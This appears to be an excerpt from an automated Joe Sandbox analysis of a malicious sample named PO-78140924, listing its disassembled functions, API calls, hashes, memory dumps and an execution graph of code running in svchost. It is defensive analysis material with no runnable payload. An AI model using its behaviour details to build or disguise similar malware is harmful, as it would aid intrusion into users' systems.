                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0009B36F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: 7005fa23142f46b49b40495efee6db802cd3198bb517f15308723c162711bc13
                                                • Instruction ID: dae29a5ec3b99f9da13325a526f05c258e4f67a49b4839fa46e96742e40f9aa3
                                                • Opcode Fuzzy Hash: 7005fa23142f46b49b40495efee6db802cd3198bb517f15308723c162711bc13
                                                • Instruction Fuzzy Hash: 391146B5D0020AEFDB41DF98D5849EEBBF5FB08310F108166E914E3620D735AA55DF50
                                                Function 0009BD86 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 000112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0001134D
                                                  • Part of subcall function 000112F3: SelectObject.GDI32(?,00000000), ref: 0001135C
                                                  • Part of subcall function 000112F3: BeginPath.GDI32(?), ref: 00011373
                                                  • Part of subcall function 000112F3: SelectObject.GDI32(?,00000000), ref: 0001139C
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0009BDAA
                                                • LineTo.GDI32(00000000,?,?), ref: 0009BDB7
                                                • EndPath.GDI32(00000000), ref: 0009BDC7
                                                • StrokePath.GDI32(00000000), ref: 0009BDD5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                • String ID:
                                                • API String ID: 1539411459-0
                                                • Opcode ID: 888209ca7a3d8d2be5189ad81fc9659a463413c484105abb574667ed6214c68f
                                                • Instruction ID: 76fa8ad802657188c3e70b3f35a7a8d775e5114b61e2f43eb2235c92a983fcc3
                                                • Opcode Fuzzy Hash: 888209ca7a3d8d2be5189ad81fc9659a463413c484105abb574667ed6214c68f
                                                • Instruction Fuzzy Hash: 7BF0823100665ABBEB126F54EC0AFDE3FA9BF45321F184002FE10A14E28B785561DFE5
                                                Function 00012218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 00012231
                                                • SetTextColor.GDI32(?,000000FF), ref: 0001223B
                                                • SetBkMode.GDI32(?,00000001), ref: 00012250
                                                • GetStockObject.GDI32(00000005), ref: 00012258
                                                • GetWindowDC.USER32(?,00000000), ref: 0004C003
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0004C010
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0004C029
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0004C042
                                                • GetPixel.GDI32(00000000,?,?), ref: 0004C062
                                                • ReleaseDC.USER32(?,00000000), ref: 0004C06D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                • String ID:
                                                • API String ID: 1946975507-0
                                                • Opcode ID: af9e2d074611cac045fff27edfb867ecfd434e8f75defb9446c39a72ee34c390
                                                • Instruction ID: dd7a01bceaac38140815614f8bc2e96dbeabad986596aa14ce02e1845ae89afc
                                                • Opcode Fuzzy Hash: af9e2d074611cac045fff27edfb867ecfd434e8f75defb9446c39a72ee34c390
                                                • Instruction Fuzzy Hash: E2E03932104245EAEB615F64EC0DBE83B60FB05332F108377FA79880E1877589A0DB61
                                                Function 0008AFB7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __itow_s
                                                • String ID: xb$xb
                                                • API String ID: 3653519197-2744082379
                                                • Opcode ID: 58b865064a8adabf4d618a66a7f60cc80f2e22a0939365c37109d93d8aa43fc0
                                                • Instruction ID: f73cd73906aa48960e9938a2908931d6c72bc9d9a80d39a5b45aef308489cda9
                                                • Opcode Fuzzy Hash: 58b865064a8adabf4d618a66a7f60cc80f2e22a0939365c37109d93d8aa43fc0
                                                • Instruction Fuzzy Hash: 39B14F70A00209EBDB24EF54C891EEEB7F9FF58300F148459F9859B252DB35EA85CB60
                                                Function 00022AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00022AC8
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00022AE1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: aa2b37476f3176c8055aeff4cd27bc7b40cab646588dc93826c56705201206b8
                                                • Instruction ID: 3ff37acdf6fc05b0d76f3c37c3550d13193b0f08ee99a91df3b13264fd8c6c10
                                                • Opcode Fuzzy Hash: aa2b37476f3176c8055aeff4cd27bc7b40cab646588dc93826c56705201206b8
                                                • Instruction Fuzzy Hash: 0A514771418744ABE320EF10D896BEBBBF8FF84314F81885DF2D9511A2DB348569CB66
                                                Function 00016D09 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00016D0D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00016E5A
                                                  • Part of subcall function 000159CD: _wcscpy.LIBCMT ref: 00015A05
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$_wcscpy
                                                • String ID: Unterminated string
                                                • API String ID: 2959994147-18753482
                                                • Opcode ID: 2056eeebd9bcbf2a8b21c7b3b5292f435f064c7dfc98e5e4117b2ca2f69fab86
                                                • Instruction ID: d624f97d34ad71fb82c5ae568a30cd673ef5c5caba4281ab1c57dd52ef31c2ab
                                                • Opcode Fuzzy Hash: 2056eeebd9bcbf2a8b21c7b3b5292f435f064c7dfc98e5e4117b2ca2f69fab86
                                                • Instruction Fuzzy Hash: EA51AE751083809EC725EB24C881AEFBBE5AF95314F44091DF8C697262DB369A89CB53
                                                Function 000797DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0001506B: __fread_nolock.LIBCMT ref: 00015089
                                                • _wcscmp.LIBCMT ref: 000798CD
                                                • _wcscmp.LIBCMT ref: 000798E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _wcscmp$__fread_nolock
                                                • String ID: FILE
                                                • API String ID: 4029003684-3121273764
                                                • Opcode ID: 6ed5d6c424d366cafd4f2c21935cd71dedac310cf6e8c646e2290f4c629f4c1a
                                                • Instruction ID: 5fdb26da1d89b1b1086b2638252689e3d4b813060253166152d55abe02777a0c
                                                • Opcode Fuzzy Hash: 6ed5d6c424d366cafd4f2c21935cd71dedac310cf6e8c646e2290f4c629f4c1a
                                                • Instruction Fuzzy Hash: F5412671A0060ABADF219BE4CC86FEFB7BDDF89710F004469FA04BB181CA75994587A5
                                                Function 00020A3B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00020ACE
                                                  • Part of subcall function 00017D2C: _memmove.LIBCMT ref: 00017D66
                                                • _wcscat.LIBCMT ref: 00055010
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FullNamePath_memmove_wcscat
                                                • String ID: S
                                                • API String ID: 257928180-186050230
                                                • Opcode ID: dd44eb98aebad92cf39d5b188a864af340e4833a7f255b1526bf92c928899d19
                                                • Instruction ID: 9dce67ac41bb71f2ae14a282166adbacf48a1098fabe5bef8876d5128ab08917
                                                • Opcode Fuzzy Hash: dd44eb98aebad92cf39d5b188a864af340e4833a7f255b1526bf92c928899d19
                                                • Instruction Fuzzy Hash: 9B31D2719083889FCB12EB74DC62AD97FB4EF0A34470804D6E9C8CF293E6349689D721
                                                Function 00036CEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __calloc_crt
                                                • String ID: @B
                                                • API String ID: 3494438863-858064360
                                                • Opcode ID: f4d33ef51e4c8e0de8474917b31d1b2b919b340856eb943cc43defe33e1d0f00
                                                • Instruction ID: b91ecc7999c97be125ceae984a3778f5b37131f1e7050619d2d9b6853bd52f2d
                                                • Opcode Fuzzy Hash: f4d33ef51e4c8e0de8474917b31d1b2b919b340856eb943cc43defe33e1d0f00
                                                • Instruction Fuzzy Hash: B0F0C871705712AAF7668F15FC117B527DCE722321F10842BFA44CE191EB39888047A5

                                                Execution Graph

                                                Execution Coverage:1.3%
                                                Dynamic/Decrypted Code Coverage:5.2%
                                                Signature Coverage:3.5%
                                                Total number of Nodes:115
                                                Total number of Limit Nodes:6
                                                execution_graph 80627 424ce3 80632 424cfc 80627->80632 80628 424d8c 80629 424d47 80635 42e5d3 80629->80635 80632->80628 80632->80629 80633 424d87 80632->80633 80634 42e5d3 RtlFreeHeap 80633->80634 80634->80628 80638 42c8b3 80635->80638 80637 424d57 80639 42c8cd 80638->80639 80640 42c8db RtlFreeHeap 80639->80640 80640->80637 80641 42bb83 80642 42bba0 80641->80642 80645 3c72df0 LdrInitializeThunk 80642->80645 80643 42bbc5 80645->80643 80738 424953 80739 42496f 80738->80739 80740 424997 80739->80740 80741 4249ab 80739->80741 80742 42c553 NtClose 80740->80742 80743 42c553 NtClose 80741->80743 80744 4249a0 80742->80744 80745 4249b4 80743->80745 80748 42e6f3 RtlAllocateHeap 80745->80748 80747 4249bf 80748->80747 80749 42f7f3 80750 42e5d3 RtlFreeHeap 80749->80750 80751 42f808 80750->80751 80752 42e6b3 80755 42c863 80752->80755 80754 42e6ce 80756 42c880 80755->80756 80757 42c88e RtlAllocateHeap 80756->80757 80757->80754 80646 41b263 80647 41b2a7 80646->80647 80649 41b2c8 80647->80649 80650 42c553 80647->80650 80651 42c570 80650->80651 80652 42c57e NtClose 80651->80652 80652->80649 80758 413f53 80759 413f5b 80758->80759 80764 4176f3 80759->80764 80761 413f8b 80762 413fd0 80761->80762 80763 413fbf PostThreadMessageW 80761->80763 80763->80762 80765 417717 80764->80765 80766 417753 LdrLoadDll 80765->80766 80767 41771e 80765->80767 80766->80767 80767->80761 80653 3c72b60 LdrInitializeThunk 80654 401bc9 80655 401bd0 80654->80655 80658 42fc63 80655->80658 80661 42e1a3 80658->80661 80662 42e1c6 80661->80662 80673 407573 80662->80673 80664 42e1dc 80672 401c72 80664->80672 80677 41b073 80664->80677 80666 42e1fb 80667 42e210 80666->80667 80692 42c8f3 80666->80692 80688 428263 80667->80688 80670 42e22a 80671 42c8f3 ExitProcess 80670->80671 80671->80672 80674 407574 80673->80674 80695 4163b3 80674->80695 80676 407580 80676->80664 80678 41b09f 80677->80678 80713 41af63 80678->80713 80681 41b0e4 80684 41b100 80681->80684 80686 42c553 NtClose 80681->80686 80682 41b0cc 80683 41b0d7 80682->80683 80685 42c553 NtClose 80682->80685 80683->80666 80684->80666 80685->80683 80687 41b0f6 80686->80687 80687->80666 80690 4282c5 80688->80690 80689 4282d2 80689->80670 80690->80689 80724 418563 80690->80724 80693 42c910 80692->80693 80694 42c921 ExitProcess 80693->80694 80694->80667 80696 4163cd 80695->80696 80698 4163e3 80696->80698 80699 42cf83 80696->80699 80698->80676 80701 42cf9d 80699->80701 80700 42cfcc 80700->80698 80701->80700 80706 42bbd3 80701->80706 80704 42e5d3 RtlFreeHeap 80705 42d03e 80704->80705 80705->80698 80707 42bbf0 80706->80707 80710 3c72c0a 80707->80710 80708 42bc19 80708->80704 80711 3c72c11 80710->80711 80712 3c72c1f LdrInitializeThunk 80710->80712 80711->80708 80712->80708 80714 41b059 80713->80714 80715 41af7d 80713->80715 80714->80681 80714->80682 80719 42bc73 80715->80719 80718 42c553 NtClose 80718->80714 80720 42bc8d 80719->80720 80723 3c735c0 LdrInitializeThunk 80720->80723 80721 41b04d 80721->80718 80723->80721 80726 41858d 80724->80726 80725 418a9b 80725->80689 80726->80725 80732 413bc3 80726->80732 80728 4186ba 80728->80725 80729 42e5d3 RtlFreeHeap 80728->80729 80730 4186d2 80729->80730 80730->80725 80731 42c8f3 ExitProcess 80730->80731 80731->80725 80733 413be3 80732->80733 80735 413c4c 80733->80735 80737 41b383 RtlFreeHeap LdrInitializeThunk 80733->80737 80735->80728 80736 413c42 80736->80728 80737->80736 80768 418cb8 80769 42c553 NtClose 80768->80769 80770 418cc2 80769->80770

                                                Executed Functions

                                                Function 004176F3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 102 4176f3-41771c call 42f2d3 105 417722-417730 call 42f8d3 102->105 106 41771e-417721 102->106 109 417740-417751 call 42dc73 105->109 110 417732-41773d call 42fb73 105->110 115 417753-417767 LdrLoadDll 109->115 116 41776a-41776d 109->116 110->109 115->116
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417765
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 6ffa1618af0632d292b0748d9317d236ce0aa7d3db29daaaf6d4baf1b5a30646
                                                • Instruction ID: 86b87a8171b12d7f86aae936b33d596f28ad6487ebe7ca077448e3c78b696474
                                                • Opcode Fuzzy Hash: 6ffa1618af0632d292b0748d9317d236ce0aa7d3db29daaaf6d4baf1b5a30646
                                                • Instruction Fuzzy Hash: 2E015EB5E4020DBBDB10EAE1DC42FDEB3789B14308F4041AAE91897280F635EB488B95
                                                Function 0042C553 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 122 42c553-42c58c call 404823 call 42d773 NtClose
                                                APIs
                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C587
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: eaaa498df1f202e73e11c77da93f6351c23fd3607e2548be4d2d18bd310d77a3
                                                • Instruction ID: 40d6515ffb0d8c156478100f86f11d36665de6fef1e232505ee3cc0160e41d75
                                                • Opcode Fuzzy Hash: eaaa498df1f202e73e11c77da93f6351c23fd3607e2548be4d2d18bd310d77a3
                                                • Instruction Fuzzy Hash: D5E08C7A6002147BD220FA9AEC01F9B776CDFC5764F00842AFA08A7242C675B90187F8
                                                Function 03C735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 142 3c735c0-3c735cc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5bca34654696f2cbbf3747880e1d8e7bff62dc23291a9053aa2bdc52fdc656fb
                                                • Instruction ID: f1b3a564e57d8db6d791bfe30329b27628126f33dd2ff5f3408a1d0e42f20d15
                                                • Opcode Fuzzy Hash: 5bca34654696f2cbbf3747880e1d8e7bff62dc23291a9053aa2bdc52fdc656fb
                                                • Instruction Fuzzy Hash: 7D90027160560802D101B2584554786100687D0705FA6C411A042C5ACD87958B5165A2
                                                Function 03C72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 140 3c72b60-3c72b6c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 177a777725175a310be796602bea5ce4e703806b62e828f0dd9dbdf77bb4c699
                                                • Instruction ID: a7d954574f12c2a64cadd64d7e6835217944f3637fb12dd8db4a44f45c985589
                                                • Opcode Fuzzy Hash: 177a777725175a310be796602bea5ce4e703806b62e828f0dd9dbdf77bb4c699
                                                • Instruction Fuzzy Hash: B09002A1202504034106B2584454696400B87E0705B96C021E101C5D4DC6258A916125
                                                Function 03C72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 141 3c72df0-3c72dfc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a8962f70cba8c53e356e32ee86b3fe82e696817c8a9c7b6f7a4d94c0892e40e6
                                                • Instruction ID: 4f6675d3e3273099332e0c4ed8d15174d0278e718619d66f0ff73dc14f53d2cb
                                                • Opcode Fuzzy Hash: a8962f70cba8c53e356e32ee86b3fe82e696817c8a9c7b6f7a4d94c0892e40e6
                                                • Instruction Fuzzy Hash: 4590027120150813D112B2584544787000A87D0745FD6C412A042C59CD97568B52A121
                                                Function 00413EDA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(2348427,00000111,00000000,00000000), ref: 00413FCA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 2348427$2348427
                                                • API String ID: 1836367815-3640307173
                                                • Opcode ID: d31d0d66d9ce17b60adb9ec3b1c155f65242298bf4dff855c0ac8c6f61c18e6d
                                                • Instruction ID: 3f36b596e20f501da8a14e9799c007ada73f55c79e5f5657cf7deea93cdb8817
                                                • Opcode Fuzzy Hash: d31d0d66d9ce17b60adb9ec3b1c155f65242298bf4dff855c0ac8c6f61c18e6d
                                                • Instruction Fuzzy Hash: 34219D76E0424879DB01DEE6AC81CEE7B7CEF81364B4540AEF400A7501E6288E0747E6
                                                Function 00413F4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(2348427,00000111,00000000,00000000), ref: 00413FCA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 2348427$2348427
                                                • API String ID: 1836367815-3640307173
                                                • Opcode ID: 9e44b47bc22a8ec0d8d21bb68f6f9abacf2703760f42439acfcad519c5b20849
                                                • Instruction ID: bb0d4e07b299566bf9c979da5f0bb69b60fc03662ff57e568f92a060d12159b2
                                                • Opcode Fuzzy Hash: 9e44b47bc22a8ec0d8d21bb68f6f9abacf2703760f42439acfcad519c5b20849
                                                • Instruction Fuzzy Hash: ED11E571E4021C7ADB00AAE19C81DEF7B7CDF45398F448069F91467141D6784F078BA6
